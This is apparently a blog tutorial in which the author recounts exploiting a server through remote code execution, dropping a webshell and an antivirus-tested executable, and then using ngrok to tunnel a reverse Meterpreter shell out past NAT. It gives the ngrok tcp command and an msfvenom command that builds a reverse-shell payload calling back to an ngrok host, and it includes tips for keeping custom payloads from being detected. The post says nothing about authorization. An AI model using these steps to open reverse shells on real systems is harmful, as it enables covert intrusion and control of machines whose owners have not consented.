If using metasploit locally on the system, I can't always set up a reverse connection over NAT.
Now here's the Current Situation!
- I found a server vulnerable to Remote RCE.
- Uploaded a webshell to gather some info.
- Uploaded an exe after carefully testing it against the AV installed over the server.
- Booted up metasploit.
- Tried to exploit it to get a bind shell but unforunately bind shell is not working (Firewall as always).
- Let's do a Reverse then ;)
- But there's another problem :(
- I'm Sitting in office and sadly I don't have Router login credentials for setting up port forwarding :(
Now what to do?
Here comes Ngrok to the rescue. :D
What's Ngrok?
"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their website
Setting up Ngrok
1. Register to ngrok. (It doesn't verify the email id though)
2. once you're logged in, just follow the instruction. you'll get a screen like this.
3. Once the setup is done, run the following command to run ngrok to listen for tcp connect on a random port and forward it to our system over NAT.
./ngrok tcp 80
4. generating meterpreter exe with ngrok settings and setup a handler to accept reverse meterpreter connection.
msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe
The above command will generate a simple exe with meterpreter stub. NOTE, I'm NOT sharing the techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made), that's a very stupid thing to do. Better use vt-notify by @Mubix. A great tool!
5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)
Now where did "127.0.0.1" came from? o_O
Ngrok is forwarding the connection to our local system so obviously, it will show "127.0.0.1" to us. When the handler receives the stager and starts sending the stage to the server, it goes through our localhost's forwarded port.
Ngrok Dashboard can help you see the number of connections you're having.
6. A drawback with this method, you can't get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.
I Hope this helps.
Thanks & Cheers!!